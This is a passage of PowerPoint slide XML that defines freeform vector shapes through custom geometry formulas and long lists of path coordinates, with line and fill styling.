                    <a:moveTo>
                      <a:pt x="23" y="14"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="22" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="14"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36196" name="Freeform 329"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="70" y="1304"/>
                <a:ext cx="606" cy="595"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 594 w 606"/>
                  <a:gd name="T1" fmla="*/ 590 h 595"/>
                  <a:gd name="T2" fmla="*/ 575 w 606"/>
                  <a:gd name="T3" fmla="*/ 565 h 595"/>
                  <a:gd name="T4" fmla="*/ 570 w 606"/>
                  <a:gd name="T5" fmla="*/ 550 h 595"/>
                  <a:gd name="T6" fmla="*/ 549 w 606"/>
                  <a:gd name="T7" fmla="*/ 514 h 595"/>
                  <a:gd name="T8" fmla="*/ 537 w 606"/>
                  <a:gd name="T9" fmla="*/ 495 h 595"/>
                  <a:gd name="T10" fmla="*/ 522 w 606"/>
                  <a:gd name="T11" fmla="*/ 488 h 595"/>
                  <a:gd name="T12" fmla="*/ 505 w 606"/>
                  <a:gd name="T13" fmla="*/ 481 h 595"/>
                  <a:gd name="T14" fmla="*/ 472 w 606"/>
                  <a:gd name="T15" fmla="*/ 471 h 595"/>
                  <a:gd name="T16" fmla="*/ 457 w 606"/>
                  <a:gd name="T17" fmla="*/ 450 h 595"/>
                  <a:gd name="T18" fmla="*/ 426 w 606"/>
                  <a:gd name="T19" fmla="*/ 444 h 595"/>
                  <a:gd name="T20" fmla="*/ 383 w 606"/>
                  <a:gd name="T21" fmla="*/ 443 h 595"/>
                  <a:gd name="T22" fmla="*/ 354 w 606"/>
                  <a:gd name="T23" fmla="*/ 428 h 595"/>
                  <a:gd name="T24" fmla="*/ 318 w 606"/>
                  <a:gd name="T25" fmla="*/ 409 h 595"/>
                  <a:gd name="T26" fmla="*/ 316 w 606"/>
                  <a:gd name="T27" fmla="*/ 435 h 595"/>
                  <a:gd name="T28" fmla="*/ 289 w 606"/>
                  <a:gd name="T29" fmla="*/ 453 h 595"/>
                  <a:gd name="T30" fmla="*/ 266 w 606"/>
                  <a:gd name="T31" fmla="*/ 459 h 595"/>
                  <a:gd name="T32" fmla="*/ 276 w 606"/>
                  <a:gd name="T33" fmla="*/ 419 h 595"/>
                  <a:gd name="T34" fmla="*/ 277 w 606"/>
                  <a:gd name="T35" fmla="*/ 403 h 595"/>
                  <a:gd name="T36" fmla="*/ 245 w 606"/>
                  <a:gd name="T37" fmla="*/ 434 h 595"/>
                  <a:gd name="T38" fmla="*/ 226 w 606"/>
                  <a:gd name="T39" fmla="*/ 460 h 595"/>
                  <a:gd name="T40" fmla="*/ 234 w 606"/>
                  <a:gd name="T41" fmla="*/ 482 h 595"/>
                  <a:gd name="T42" fmla="*/ 200 w 606"/>
                  <a:gd name="T43" fmla="*/ 509 h 595"/>
                  <a:gd name="T44" fmla="*/ 171 w 606"/>
                  <a:gd name="T45" fmla="*/ 540 h 595"/>
                  <a:gd name="T46" fmla="*/ 136 w 606"/>
                  <a:gd name="T47" fmla="*/ 567 h 595"/>
                  <a:gd name="T48" fmla="*/ 134 w 606"/>
                  <a:gd name="T49" fmla="*/ 548 h 595"/>
                  <a:gd name="T50" fmla="*/ 165 w 606"/>
                  <a:gd name="T51" fmla="*/ 521 h 595"/>
                  <a:gd name="T52" fmla="*/ 171 w 606"/>
                  <a:gd name="T53" fmla="*/ 482 h 595"/>
                  <a:gd name="T54" fmla="*/ 148 w 606"/>
                  <a:gd name="T55" fmla="*/ 488 h 595"/>
                  <a:gd name="T56" fmla="*/ 129 w 606"/>
                  <a:gd name="T57" fmla="*/ 477 h 595"/>
                  <a:gd name="T58" fmla="*/ 99 w 606"/>
                  <a:gd name="T59" fmla="*/ 482 h 595"/>
                  <a:gd name="T60" fmla="*/ 77 w 606"/>
                  <a:gd name="T61" fmla="*/ 447 h 595"/>
                  <a:gd name="T62" fmla="*/ 49 w 606"/>
                  <a:gd name="T63" fmla="*/ 427 h 595"/>
                  <a:gd name="T64" fmla="*/ 72 w 606"/>
                  <a:gd name="T65" fmla="*/ 415 h 595"/>
                  <a:gd name="T66" fmla="*/ 43 w 606"/>
                  <a:gd name="T67" fmla="*/ 404 h 595"/>
                  <a:gd name="T68" fmla="*/ 43 w 606"/>
                  <a:gd name="T69" fmla="*/ 370 h 595"/>
                  <a:gd name="T70" fmla="*/ 67 w 606"/>
                  <a:gd name="T71" fmla="*/ 338 h 595"/>
                  <a:gd name="T72" fmla="*/ 105 w 606"/>
                  <a:gd name="T73" fmla="*/ 326 h 595"/>
                  <a:gd name="T74" fmla="*/ 115 w 606"/>
                  <a:gd name="T75" fmla="*/ 290 h 595"/>
                  <a:gd name="T76" fmla="*/ 86 w 606"/>
                  <a:gd name="T77" fmla="*/ 292 h 595"/>
                  <a:gd name="T78" fmla="*/ 30 w 606"/>
                  <a:gd name="T79" fmla="*/ 286 h 595"/>
                  <a:gd name="T80" fmla="*/ 33 w 606"/>
                  <a:gd name="T81" fmla="*/ 259 h 595"/>
                  <a:gd name="T82" fmla="*/ 28 w 606"/>
                  <a:gd name="T83" fmla="*/ 230 h 595"/>
                  <a:gd name="T84" fmla="*/ 69 w 606"/>
                  <a:gd name="T85" fmla="*/ 227 h 595"/>
                  <a:gd name="T86" fmla="*/ 110 w 606"/>
                  <a:gd name="T87" fmla="*/ 219 h 595"/>
                  <a:gd name="T88" fmla="*/ 111 w 606"/>
                  <a:gd name="T89" fmla="*/ 205 h 595"/>
                  <a:gd name="T90" fmla="*/ 66 w 606"/>
                  <a:gd name="T91" fmla="*/ 170 h 595"/>
                  <a:gd name="T92" fmla="*/ 30 w 606"/>
                  <a:gd name="T93" fmla="*/ 115 h 595"/>
                  <a:gd name="T94" fmla="*/ 85 w 606"/>
                  <a:gd name="T95" fmla="*/ 65 h 595"/>
                  <a:gd name="T96" fmla="*/ 133 w 606"/>
                  <a:gd name="T97" fmla="*/ 41 h 595"/>
                  <a:gd name="T98" fmla="*/ 165 w 606"/>
                  <a:gd name="T99" fmla="*/ 19 h 595"/>
                  <a:gd name="T100" fmla="*/ 192 w 606"/>
                  <a:gd name="T101" fmla="*/ 13 h 595"/>
                  <a:gd name="T102" fmla="*/ 229 w 606"/>
                  <a:gd name="T103" fmla="*/ 19 h 595"/>
                  <a:gd name="T104" fmla="*/ 262 w 606"/>
                  <a:gd name="T105" fmla="*/ 40 h 595"/>
                  <a:gd name="T106" fmla="*/ 325 w 606"/>
                  <a:gd name="T107" fmla="*/ 50 h 595"/>
                  <a:gd name="T108" fmla="*/ 421 w 606"/>
                  <a:gd name="T109" fmla="*/ 77 h 595"/>
                  <a:gd name="T110" fmla="*/ 433 w 606"/>
                  <a:gd name="T111" fmla="*/ 281 h 595"/>
                  <a:gd name="T112" fmla="*/ 458 w 606"/>
                  <a:gd name="T113" fmla="*/ 435 h 595"/>
                  <a:gd name="T114" fmla="*/ 493 w 606"/>
                  <a:gd name="T115" fmla="*/ 475 h 595"/>
                  <a:gd name="T116" fmla="*/ 528 w 606"/>
                  <a:gd name="T117" fmla="*/ 465 h 595"/>
                  <a:gd name="T118" fmla="*/ 580 w 606"/>
                  <a:gd name="T119" fmla="*/ 547 h 595"/>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606"/>
                  <a:gd name="T181" fmla="*/ 0 h 595"/>
                  <a:gd name="T182" fmla="*/ 606 w 606"/>
                  <a:gd name="T183" fmla="*/ 595 h 595"/>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606" h="595">
                    <a:moveTo>
                      <a:pt x="606" y="584"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="605" y="589"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="602" y="590"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="592"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="595"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="595" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="594" y="590"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="595" y="585"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="595" y="579"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="592" y="571"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="587" y="563"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="564"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="575" y="565"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="574" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="571" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="570" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="570" y="560"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="554"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="570" y="550"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="566" y="544"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="531"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="529"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="553" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="517"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="511"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="507"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="506"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="543" y="502"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="537" y="495"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="526" y="479"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="465"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="465"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="519" y="476"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="523" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="495"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="517" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="492"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="511" y="485"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="479"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="505" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="496" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="505" y="487"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="505" y="490"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="486" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="476" y="475"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="471"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="460" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="460"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="459" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="448"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="445" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="448"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="444"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="422" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="417" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="444"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="427"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="361" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="428"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="353" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="418"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="332" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="417"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="417"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="309" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="427"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="309" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="444"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="444"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="445"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="469"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="471"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="466"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="465"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="445"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="429"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="419"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="417"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="419"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="448"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="460"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="468"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="474"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="475"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="476"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="479"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="487"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="505"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="519"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="533"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="538"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="540"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="542"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="554"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="559"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="564"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="565"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="563"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="558"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="555"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="548"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="542"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="543"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="540"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="533"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="529"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="518"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="508"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="491"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="486"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="480"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="476"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="480"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="492"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="491"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="487"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="476"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="479"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="485"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="460"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="439"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="445"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="449"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="448"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="438"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="427"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="418"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="339"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
